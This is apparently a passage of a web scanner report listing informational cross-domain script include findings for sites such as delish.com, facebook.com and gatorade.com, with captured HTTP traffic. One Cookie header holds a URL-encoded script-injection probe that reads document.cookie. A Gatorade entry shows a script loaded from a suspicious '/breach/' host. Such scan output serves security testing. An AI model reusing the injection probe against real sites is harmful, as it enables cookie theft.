Set-Cookie: SESS2c2d3112bb07aea5c6314767c88e0a7a=7o9nkha47fuqrullf1i58nh6t2; expires=Tue, 22-Feb-2011 06:38:51 GMT; path=/; domain=.dailygrail.com
Last-Modified: Sun, 30 Jan 2011 02:11:26 GMT
ETag: "bf0c65ff60c7c1de71eb6cacfe0d3728"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 30 Jan 2011 03:05:32 GMT
Server: lighttpd
Content-Length: 63252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" dir="ltr">
<head>
<meta http-eq
...[SNIP]...
</script><script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script><script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</p>
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</script><script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

23.438. http://www.davidpoll.com/2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.davidpoll.com
Path:	/2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://tweetmeme.com/i/scripts/button.js

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:23:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.davidpoll.com/xmlrpc.php
Link: <http://www.davidpoll.com/?p=403>; rel=shortlink
Set-Cookie: PHPSESSID=782daaca0cd252e2cad9d7049b165cec; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-equiv
...[SNIP]...
</script><script type="text/javascript" src="http://tweetmeme.com/i/scripts/button.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

23.439. http://www.delish.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.delish.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.redacted/library/dap.js
http://analytics.live.com/Analytics/wlAnalytics.js
http://blstj.redacted/br/gbl/js/2/report.js
http://blstj.redacted/br/gbl/js/4/mozcompat.js
http://blstj.redacted/br/gbl/js/7/core.js
http://cdn.krxd.net/krux.js
http://images.video.msn.com/js/ch/channels.js
http://w.sharethis.com/button/sharethis.js;onmouseover=false

Request

GET / HTTP/1.1
Host: www.delish.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 87366
Content-Type: text/html
Cache-Control: max-age=189
Date: Sat, 29 Jan 2011 23:53:33 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>

<script language="javascript" src="http://images.video.redacted/js/ch/channels.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=d63a4976-501a-446d-81e6-434d03d8388c&type=website&buttonText=&embeds=true&post_services=facebook%2Ctwitter%2Cdelicious%2Cstumbleupon%2Cmyspace%2Cdigg%2Creddit%2Cblogger%2Cwordpress%2Ctypepad%2Cgoogle_bmarks%2Cwindows_live%2Cfark%2Cbus_exchange%2Cpropeller%2Cnewsvine%2Clinkedin%2Ctechnorati%2Cmixx%2Cybuzz%2Cfriendfeed&linkfg=%23668c1f&offsetLeft=-180;onmouseover=false"></script>
...[SNIP]...

<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/core.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/2/report.js"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/4/mozcompat.js"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://analytics.live.com/Analytics/wlAnalytics.js"></script>
...[SNIP]...
</script>
<script src="http://cdn.krxd.net/krux.js"></script>
...[SNIP]...

23.440. http://www.delish.com/entertaining-ideas/party-ideas/valentines-day-romantic-recipes-tips previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.delish.com
Path:	/entertaining-ideas/party-ideas/valentines-day-romantic-recipes-tips

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.redacted/library/dap.js
http://analytics.live.com/Analytics/wlAnalytics.js
http://blstj.redacted/br/gbl/js/2/report.js
http://blstj.redacted/br/gbl/js/4/mozcompat.js
http://blstj.redacted/br/gbl/js/7/core.js
http://cdn.krxd.net/krux.js
http://images.video.msn.com/js/ch/channels.js
http://w.sharethis.com/button/sharethis.js;onmouseover=false

Request

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 109796
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=337
Date: Sat, 29 Jan 2011 23:53:33 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>

<script language="javascript" src="http://images.video.redacted/js/ch/channels.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=d63a4976-501a-446d-81e6-434d03d8388c&type=website&buttonText=&embeds=true&post_services=facebook%2Ctwitter%2Cdelicious%2Cstumbleupon%2Cmyspace%2Cdigg%2Creddit%2Cblogger%2Cwordpress%2Ctypepad%2Cgoogle_bmarks%2Cwindows_live%2Cfark%2Cbus_exchange%2Cpropeller%2Cnewsvine%2Clinkedin%2Ctechnorati%2Cmixx%2Cybuzz%2Cfriendfeed&linkfg=%23668c1f&offsetLeft=-180;onmouseover=false"></script>
...[SNIP]...

<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/core.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/2/report.js"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/4/mozcompat.js"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://analytics.live.com/Analytics/wlAnalytics.js"></script>
...[SNIP]...
</script>
<script src="http://cdn.krxd.net/krux.js"></script>
...[SNIP]...

23.441. http://www.delish.com/food/recalls-reviews/its-not-bakery-its-digiorno previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.delish.com
Path:	/food/recalls-reviews/its-not-bakery-its-digiorno

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.redacted/library/dap.js
http://analytics.live.com/Analytics/wlAnalytics.js
http://blstj.redacted/br/gbl/js/2/report.js
http://blstj.redacted/br/gbl/js/4/mozcompat.js
http://blstj.redacted/br/gbl/js/7/core.js
http://cdn.krxd.net/krux.js
http://images.video.msn.com/js/ch/channels.js
http://w.sharethis.com/button/sharethis.js;onmouseover=false

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dooce.com
Path:	/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.redacted\|msn.com/wonderwall\|v14.msn.com/\|preview.redacted/\|www.redacted/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The response dynamically includes the following scripts from other domains:

http://static.fmpub.net/zone/2555
http://static.fmpub.net/zone/936

Request

Response

23.443. http://www.everyblock.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.everyblock.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js

Request

GET / HTTP/1.1
Host: www.everyblock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sun, 30 Jan 2011 03:05:36 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 13518
Last-Modified: Thu, 30 Dec 2010 18:49:16 GMT
Connection: close
Vary: Accept-Encoding
Expires: Sun, 30 Jan 2011 04:05:36 GMT
Cache-Control: max-age=3600
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<title>EveryBlock ... A news feed for your block</title>
<meta http-equiv="Content-Ty
...[SNIP]...
</style>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

23.444. http://www.facebook.com/2008/fbml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/2008/fbml

Issue detail

The response dynamically includes the following script from another domain:

http://e.static.ak.fbcdn.net/rsrc.php/yM/r/6hIcCnDV7Kr.js

Request

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=GX4VM; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 30 Jan 2011 01:52:38 GMT
Content-Length: 11463

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://c.static.ak.fbcdn.net/rsrc.php/y_/r/U9jPqGxMK3h.css" />

<script type="text/javascript" src="http://e.static.ak.fbcdn.net/rsrc.php/yM/r/6hIcCnDV7Kr.js"></script>
...[SNIP]...

23.445. http://www.facebook.com/HelenASPopkin previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/HelenASPopkin

Issue detail

The response dynamically includes the following script from another domain:

http://e.static.ak.fbcdn.net/rsrc.php/yM/r/6hIcCnDV7Kr.js

Request

Response

23.446. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/yM/r/6hIcCnDV7Kr.js

Request

Response

23.447. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The response dynamically includes the following script from another domain:

http://e.static.ak.fbcdn.net/rsrc.php/yM/r/6hIcCnDV7Kr.js

Request

GET /plugins/like.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS;

Response

23.448. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The response dynamically includes the following script from another domain:

http://e.static.ak.fbcdn.net/rsrc.php/yM/r/6hIcCnDV7Kr.js

Request

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 30 Jan 2011 01:22:21 GMT
Content-Length: 11156

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://c.static.ak.fbcdn.net/rsrc.php/y_/r/U9jPqGxMK3h.css" />

<script type="text/javascript" src="http://e.static.ak.fbcdn.net/rsrc.php/yM/r/6hIcCnDV7Kr.js"></script>
...[SNIP]...

23.449. http://www.facebook.com/sharer.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/sharer.php

Issue detail

The response dynamically includes the following script from another domain:

http://e.static.ak.fbcdn.net/rsrc.php/yM/r/6hIcCnDV7Kr.js

Request

Response

23.450. http://www.facebook.com/todd.kenreck previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/todd.kenreck

Issue detail

The response dynamically includes the following script from another domain:

http://e.static.ak.fbcdn.net/rsrc.php/yM/r/6hIcCnDV7Kr.js

Request

Response

23.451. http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.foxsportsarizona.com
Path:	/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/rsn.arizona/landing;tile=3;sz=300x250;ord=1296344370?
http://ad.doubleclick.net/adj/rsn.arizona/landing;tile=3;sz=728x90;ord=1296344370?
http://blstj.redacted/br/chan/mops/js/foxsportsheader/core.js
http://blstj.redacted/br/gbl/js/4/mozcompat.js
http://blstj.redacted/br/gbl/js/7/jquery-1.3.2.min.js
http://blstj.redacted/br/gbl/js/7/navigation.js
http://platform.twitter.com/widgets.js

Request

Response

23.452. http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.foxsportsarizona.com
Path:	/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/rsn.arizona/landing;tile=3;sz=300x250;ord=1296407429?
http://ad.doubleclick.net/adj/rsn.arizona/landing;tile=3;sz=728x90;ord=1296407429?
http://blstj.redacted/br/chan/mops/js/foxsportsheader/core.js
http://blstj.redacted/br/gbl/js/4/mozcompat.js
http://blstj.redacted/br/gbl/js/7/jquery-1.3.2.min.js
http://blstj.redacted/br/gbl/js/7/navigation.js

Request

Response

23.453. http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.foxsportsarizona.com
Path:	/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/rsn.arizona/landing;tile=3;sz=300x250;ord=1296344904?
http://ad.doubleclick.net/adj/rsn.arizona/landing;tile=3;sz=728x90;ord=1296344904?
http://blstj.redacted/br/chan/mops/js/foxsportsheader/core.js
http://blstj.redacted/br/gbl/js/4/mozcompat.js
http://blstj.redacted/br/gbl/js/7/jquery-1.3.2.min.js
http://blstj.redacted/br/gbl/js/7/navigation.js

Request

Response

23.454. http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.foxsportsarizona.com
Path:	/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/rsn.arizona/landing;tile=3;sz=300x250;ord=1296406997?
http://ad.doubleclick.net/adj/rsn.arizona/landing;tile=3;sz=728x90;ord=1296406997?
http://blstj.redacted/br/chan/mops/js/foxsportsheader/core.js
http://blstj.redacted/br/gbl/js/4/mozcompat.js
http://blstj.redacted/br/gbl/js/7/jquery-1.3.2.min.js
http://blstj.redacted/br/gbl/js/7/navigation.js
http://platform.twitter.com/widgets.js

Request

Response

23.455. http://www.gatorade.com/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gatorade.com
Path:	/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://321cba.com/breach/18.js

Request

GET /default.aspx HTTP/1.1
Host: www.gatorade.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:22:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=bcqqnluqy4sgfbug42ap0b55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 41658

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
Gatorad
...[SNIP]...
<meta name="google-site-verification" content="urVYKRjWIeor2vJRZ8fvAklweDgUIM76CTiQ-jlkHiE" />

<script type="text/javascript" src="http://321cba.com/breach/18.js"></script>
...[SNIP]...

23.456. https://www.google.com/adsense/support/bin/request.py previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.google.com
Path:	/adsense/support/bin/request.py

Issue detail

The response dynamically includes the following script from another domain:

https://ssl.google-analytics.com/ga.js

Request

GET /adsense/support/bin/request.py HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: N_T=sess%3D303678ee3ceffa89%26v%3D2%26c%3De08e7d44%26s%3D4d44bd51%26t%3DR%3A0%3A%26sessref%3D; Expires=Sun, 30-Jan-2011 01:52:25 GMT; Path=/adsense/support; Secure; HttpOnly
Content-Type: text/html; charset=UTF-8
Date: Sun, 30 Jan 2011 01:22:25 GMT
Expires: Sun, 30 Jan 2011 01:22:25 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<script type="text/javascript">serverResponseTimeDelta=window.external&&window.extern
...[SNIP]...
</script>
<script src='//ssl.google-analytics.com/ga.js'
type='text/javascript'></script>
...[SNIP]...

23.457. http://www.hobbyspace.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hobbyspace.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.assoc-amazon.com/s/ads.js
http://www.assoc-amazon.com/s/link-enhancer?tag=hobbyspace

Request

GET / HTTP/1.1
Host: www.hobbyspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:06:12 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 59667

<html>
<head>

<title>HobbySpace - Home</title>


<meta http-equiv="Content-Type" content="text
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.assoc-amazon.com/s/ads.js"></script>
...[SNIP]...
<script type="text/javascript" src="http://www.assoc-amazon.com/s/link-enhancer?tag=hobbyspace">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

23.458. http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hoovers.com
Path:	/business-information/--pageid__13823--/global-mktg-index.xhtml

Issue detail

The response dynamically includes the following script from another domain:

http://js.bizographics.com/convert_data.js?partner_id=169

Request

Response

23.459. http://www.interactivedata-rts.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.interactivedata-rts.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://www.interactivedata.com/js/hbx.js

Request

GET / HTTP/1.1
Host: www.interactivedata-rts.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.460. http://www.kanoodle.com/search_spy.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kanoodle.com
Path:	/search_spy.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://static.pulse360.com/yui/build/cookie/cookie-beta-min.js
http://static.pulse360.com/yui/build/yahoo/yahoo-min.js
http://static.pulse360.com/yui/build/yuiloader/yuiloader-beta-min.js

Request

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 14:53:31 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650; domain=.kanoodle.com; path=/; expires=Sun, 13-Feb-2011 14:53:31 GMT
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 14397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Kanoodle - Providing Search-Targeted Sponsored Links Since 1999<
...[SNIP]...
</script>
<script type="text/javascript" src="http://static.pulse360.com/yui/build/yahoo/yahoo-min.js"></script>
<script type="text/javascript" src="http://static.pulse360.com/yui/build/yuiloader/yuiloader-beta-min.js" ></script>

<script type="text/javascript" src="http://static.pulse360.com/yui/build/cookie/cookie-beta-min.js"></script>
...[SNIP]...

23.461. http://www.livescience.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.livescience.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.toptenreviews.com/r/c/request.php?path=tmn/ls&sub_id=testsubid
http://edge.quantserve.com/quant.js

Request

GET / HTTP/1.1
Host: www.livescience.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:05:40 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 68905

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>LiveS
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</div><script type='text/javascript' id='popup_tag_script' src='http://api.toptenreviews.com/r/c/request.php?path=tmn/ls&sub_id=testsubid'></script>
...[SNIP]...

23.462. http://www.merchantcircle.com/corporate/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.merchantcircle.com
Path:	/corporate/

Issue detail

The response dynamically includes the following scripts from other domains:

http://partner.googleadservices.com/gampad/google_service.js
https://seal.verisign.com/getseal?host_name=www.merchantcircle.com&size=S&use_flash=NO&use_transparent=NO&lang=en

Request

GET /corporate/ HTTP/1.1
Host: www.merchantcircle.com
Proxy-Connection: keep-alive
Referer: http://www.bloglines.com/contact/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Expires: Sun, 30 Jan 2011 17:26:34 GMT
Cache-Control: max-age=300
Content-Type: text/html
Content-Length: 17617
Date: Sun, 30 Jan 2011 17:21:34 GMT
Server: lighttpd/1.4.11

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>MerchantCircle.com |
...[SNIP]...
</script>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<div style="float:left;clear:left;width:100px;height:60px;margin-left:30px;">
<script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.merchantcircle.com&size=S&use_flash=NO&use_transparent=NO&lang=en" ></script>
...[SNIP]...

23.463. http://www.merchantcircle.com/corporate/503.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.merchantcircle.com
Path:	/corporate/503.html

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /corporate/503.html HTTP/1.1
Host: www.merchantcircle.com
Proxy-Connection: keep-alive
Referer: http://www.merchantcircle.com/corporate/
X-Requested-With: XMLHttpRequest
Accept: application/json
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=36432316.1296408105.1.1.utmcsr=bloglines.com|utmccn=(referral)|utmcmd=referral|utmcct=/contact/; __utma=36432316.11964383.1296408105.1296408105.1296408105.1; __utmc=36432316; __utmb=36432316.1.10.1296408105

Response

HTTP/1.1 200 OK
Expires: Sun, 30 Jan 2011 18:21:49 GMT
Cache-Control: max-age=3600
Content-Type: text/html
Content-Length: 12113
Date: Sun, 30 Jan 2011 17:21:49 GMT
Server: lighttpd/1.4.11

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>MerchantCircle.com |
...[SNIP]...
</script>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

23.464. http://www.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.redacted
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js

Request

Response

23.465. http://www.redacted/defaultwpe7.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.redacted
Path:	/defaultwpe7.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://tk2.stj.s-redacted/br/hp/11/en-us/js/404_1.js

Request

GET /defaultwpe7.aspx HTTP/1.1
Host: www.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
